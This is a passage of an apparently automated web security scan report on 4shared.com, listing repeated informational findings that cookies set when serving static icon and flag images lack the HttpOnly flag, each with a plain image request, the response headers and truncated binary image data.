Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:28 GMT
ETag: W/"234-1302522786000"
Last-Modified: Mon, 11 Apr 2011 11:53:06 GMT
Content-Type: image/png
Content-Length: 234
Date: Fri, 29 Jul 2011 14:09:28 GMT

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.%.q....022......%........`...YEE...s...!..i...d...;X........pC...p......`....4......{7...= ...l....^.R....-..l..
...[SNIP]...

6.86. http://www.4shared.com/images/icons/64x64/dollars.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/64x64/dollars.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/64x64/dollars.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:03:00 GMT; Path=/
Set-Cookie: hostid=-964388347; Expires=Mon, 26-Jul-2021 14:03:00 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:03:00 GMT
ETag: W/"5709-1296125992000"
Last-Modified: Thu, 27 Jan 2011 10:59:52 GMT
Content-Type: image/png
Content-Length: 5709
Date: Fri, 29 Jul 2011 14:03:00 GMT

.PNG
.
...IHDR...?...?.....W_......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[il\.u>o..3...I-....$[...i.@rl7.."...u....(...........E..IP.E..I.4m.G..x.-..eK.....}83..-.........%.#=..e..g..w.....?~
...[SNIP]...

6.87. http://www.4shared.com/images/icons/64x64/support.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/64x64/support.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/64x64/support.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:03:00 GMT; Path=/
Set-Cookie: hostid=1922893287; Expires=Mon, 26-Jul-2021 14:03:00 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:03:00 GMT
ETag: W/"7725-1296125992000"
Last-Modified: Thu, 27 Jan 2011 10:59:52 GMT
Content-Type: image/png
Content-Length: 7725
Date: Fri, 29 Jul 2011 14:03:00 GMT

.PNG
.
...IHDR...?...@......+......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[i..gy~........-......,_...6.cs.........B.?.2?RE~...8@..* .9.26`..[..ek..,...j....{z...._w..k    d...........y.o.=..C.z    !.
...[SNIP]...

6.88. http://www.4shared.com/images/icons/all.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/all.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/all.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:02:45 GMT; Path=/
Set-Cookie: hostid=801665821; Expires=Mon, 26-Jul-2021 14:02:45 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:02:45 GMT
ETag: W/"43289-1311929454000"
Last-Modified: Fri, 29 Jul 2011 08:50:54 GMT
Content-Type: image/png
Content-Length: 43289
Date: Fri, 29 Jul 2011 14:02:45 GMT

.PNG
.
...IHDR.............K.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..}.`.E...{..K.    !..B...@h. .4..
R.......A,.......H....HHH/...z....].!......?/..;;.dvv.}.wfv...x1.0.3...h\....T.........~x
...[SNIP]...

6.89. http://www.4shared.com/images/icons/flags/ae.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/ae.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/ae.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:46 GMT; Path=/
Set-Cookie: hostid=-1395312391; Expires=Mon, 26-Jul-2021 13:59:46 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:46 GMT
ETag: W/"361-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 361
Date: Fri, 29 Jul 2011 13:59:46 GMT

GIF89a........]].h.....X..G..........DDDM.M;;;...R.R444.EE.{..YY.{{.ww.......t..JI..........OO.==.TT.yy/./...o.o)))V.V.OP\.\7.7._`PPP@.@....XX.JKe.e.jj.SS!!!KKKa.`H.H.rs............................
...[SNIP]...

6.90. http://www.4shared.com/images/icons/flags/ar.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/ar.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/ar.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:46 GMT; Path=/
Set-Cookie: hostid=739588649; Expires=Mon, 26-Jul-2021 13:59:46 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:46 GMT
ETag: W/"366-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 366
Date: Fri, 29 Jul 2011 13:59:46 GMT

GIF89a.......6.......i...i..|..L........u........*......................I.......................................C....................!....................Y..........^a..|...................u..........
...[SNIP]...

6.91. http://www.4shared.com/images/icons/flags/au.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/au.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/au.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:46 GMT; Path=/
Set-Cookie: hostid=2072054508; Expires=Mon, 26-Jul-2021 13:59:46 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:46 GMT
ETag: W/"378-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 378
Date: Fri, 29 Jul 2011 13:59:46 GMT

GIF89a..........Sj.....-..w.Zr...........+HA\...2..R#A........ih...v..Jc......e...h}.5Q....Mk.:V..v.m........E_.q..0M.Ib.>Y..fj.qo......u=i..........................q....kEu....op.~......KM........
...[SNIP]...

6.92. http://www.4shared.com/images/icons/flags/bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:46 GMT; Path=/
Set-Cookie: hostid=-1980316378; Expires=Mon, 26-Jul-2021 13:59:46 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:46 GMT
ETag: W/"360-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 360
Date: Fri, 29 Jul 2011 13:59:46 GMT

GIF89a........FF...6.6V.$y.q.--............Iy....<.<M.M...K.K.......[[.dd...-.-......j.=.RS....==r.G.........%.%.;;......a.2.44...@.@.R.R......+.+...F.FX.X . ...0.0..........B..44;.:....!!A.A.......
...[SNIP]...

6.93. http://www.4shared.com/images/icons/flags/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/bh.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/bh.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:50 GMT; Path=/
Set-Cookie: hostid=827177232; Expires=Mon, 26-Jul-2021 13:59:50 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:50 GMT
ETag: W/"367-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 367
Date: Fri, 29 Jul 2011 13:59:50 GMT

GIF89a........--.AA.RR..........**.;;....... .%%..EE.KK.......ji.>>....66.......KK.GG.......nn.00.fe.......44....WW....22...................\\.BB..........pq....QQ.WW.66....55......................
...[SNIP]...

6.94. http://www.4shared.com/images/icons/flags/bo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/bo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/bo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:50 GMT; Path=/
Set-Cookie: hostid=-1070391843; Expires=Mon, 26-Jul-2021 13:59:50 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:50 GMT
ETag: W/"359-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 359
Date: Fri, 29 Jul 2011 13:59:50 GMT

GIF89a.......;.;..|..M.....H.ul..X.}s.......bWi.iC.B&.&..c...............J.J..]..3..i..36.6..k].]..u.....*..a..............C..I..W..R..>..9..MQ.Q....m...:Q......ka..d..p...O.O..z..Q..U.....Y....?U.U.
...[SNIP]...

6.95. http://www.4shared.com/images/icons/flags/br.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/br.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/br.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:50 GMT; Path=/
Set-Cookie: hostid=702271499; Expires=Mon, 26-Jul-2021 13:59:50 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:50 GMT
ETag: W/"367-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 367
Date: Fri, 29 Jul 2011 13:59:50 GMT

GIF89a.............d.d..)b.T.+.ej......TE.E..R{.{S.SCv.h.i..J.X...._._.D.&.&/k...k...;.;9r.5.5..D...6.6v.v...L.L......o.ov.;[.[~..ww....0./.....6..:\..ms.s....B7....19.4..C..s..I.....Q?.@..D...-`...Z.
...[SNIP]...

6.96. http://www.4shared.com/images/icons/flags/ca.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/ca.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/ca.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:50 GMT; Path=/
Set-Cookie: hostid=-413967832; Expires=Mon, 26-Jul-2021 13:59:50 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:50 GMT
ETag: W/"376-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 376
Date: Fri, 29 Jul 2011 13:59:50 GMT

GIF89a....................zz.il.......<B......................DI.EG.$(.7:.^_....]c.sv..........}........ns.MS.NT.(,.......ef.af.09.UY.lm.XX.KS.....'.jk......................R].+/..........U[.......27.
...[SNIP]...

6.97. http://www.4shared.com/images/icons/flags/fi.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/fi.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/fi.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:52 GMT; Path=/
Set-Cookie: hostid=1909348762; Expires=Mon, 26-Jul-2021 13:59:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:52 GMT
ETag: W/"371-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 371
Date: Fri, 29 Jul 2011 13:59:52 GMT

GIF89a..............+.Ds.......f..Y..;l.......Q}....k..2e....U.................a..Mz.......Nz._........c.....Jx....O|................@o....f......4.Y..7j.............d..............Hw.................
...[SNIP]...

6.98. http://www.4shared.com/images/icons/flags/fr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/fr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/fr.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:52 GMT; Path=/
Set-Cookie: hostid=-494874545; Expires=Mon, 26-Jul-2021 13:59:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:52 GMT
ETag: W/"366-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 366
Date: Fri, 29 Jul 2011 13:59:51 GMT

GIF89a.................dV...W{......~..................f...j].............vj.......~r.......    .r......WI.pd.......j\..........nb.wk.fZ.]O.RC.M>.......G........^P...Dl.......o...........,W..............
...[SNIP]...

6.99. http://www.4shared.com/images/icons/flags/gb.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/gb.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/gb.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:52 GMT; Path=/
Set-Cookie: hostid=1048791324; Expires=Mon, 26-Jul-2021 13:59:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:52 GMT
ETag: W/"260-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 260
Date: Fri, 29 Jul 2011 13:59:51 GMT

GIF89a........QNPe...m..........45.Ki....+..............`U..|a......cb{.....<R...7q......a...ds.............!.......,...........`.LP.eY...tLL.a.....E....E...|$...A.0..FD....GJ.rIt<.0...x
..r.6......q
...[SNIP]...

6.100. http://www.4shared.com/images/icons/flags/iq.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/iq.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/iq.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:52 GMT; Path=/
Set-Cookie: hostid=-1228318283; Expires=Mon, 26-Jul-2021 13:59:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:52 GMT
ETag: W/"361-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 361
Date: Fri, 29 Jul 2011 13:59:52 GMT

GIF89a.............,,,.TT....\\FFF.........}{}....ccccd<<<.............LL.kk.EE.{z.88[[[....vvRRS................qr...444...lil........ww.pq............pnp..........jj.//srsxvx....LL.......zz.......
...[SNIP]...

6.101. http://www.4shared.com/images/icons/flags/ir.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/ir.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/ir.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:54 GMT; Path=/
Set-Cookie: hostid=-303757224; Expires=Mon, 26-Jul-2021 13:59:54 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:54 GMT
ETag: W/"366-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 366
Date: Fri, 29 Jul 2011 13:59:53 GMT

GIF89a..................................J.J.......ef.........b.b....w..33.L.\.\...{.{.d.....DD.[[R.Qk.k<.<r.s....PP.--.DD.%%.;;...........................?.?w.w...S.SW.W...1.0.77.<<...................
...[SNIP]...

6.102. http://www.4shared.com/images/icons/flags/it.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/it.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/it.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:54 GMT; Path=/
Set-Cookie: hostid=-1384037430; Expires=Mon, 26-Jul-2021 13:59:54 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:54 GMT
ETag: W/"366-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 366
Date: Fri, 29 Jul 2011 13:59:54 GMT

GIF89a........LL................UU....==......X.Y.W.....\.\...C.BT.U.}.{.{.e.T.T.%%...O.O.v..22..........11I.I....++y.yt.t....o.....66X.X....,,...K.K.77:.:h.h.\\.55.DD`.a............................
...[SNIP]...

6.103. http://www.4shared.com/images/icons/flags/jp.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/jp.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/jp.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:55 GMT; Path=/
Set-Cookie: hostid=-757274033; Expires=Mon, 26-Jul-2021 13:59:55 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:55 GMT
ETag: W/"366-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 366
Date: Fri, 29 Jul 2011 13:59:54 GMT

GIF89a........;;...................//.66..........**.............FF....55.++.44.UU....<<....KK.HH.$$.......**.AA....}}..........UU.[[.........................yy.~.....................................
...[SNIP]...

6.104. http://www.4shared.com/images/icons/flags/kw.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/kw.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/kw.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:55 GMT; Path=/
Set-Cookie: hostid=1900381929; Expires=Mon, 26-Jul-2021 13:59:55 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:55 GMT
ETag: W/"362-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 362
Date: Fri, 29 Jul 2011 13:59:54 GMT

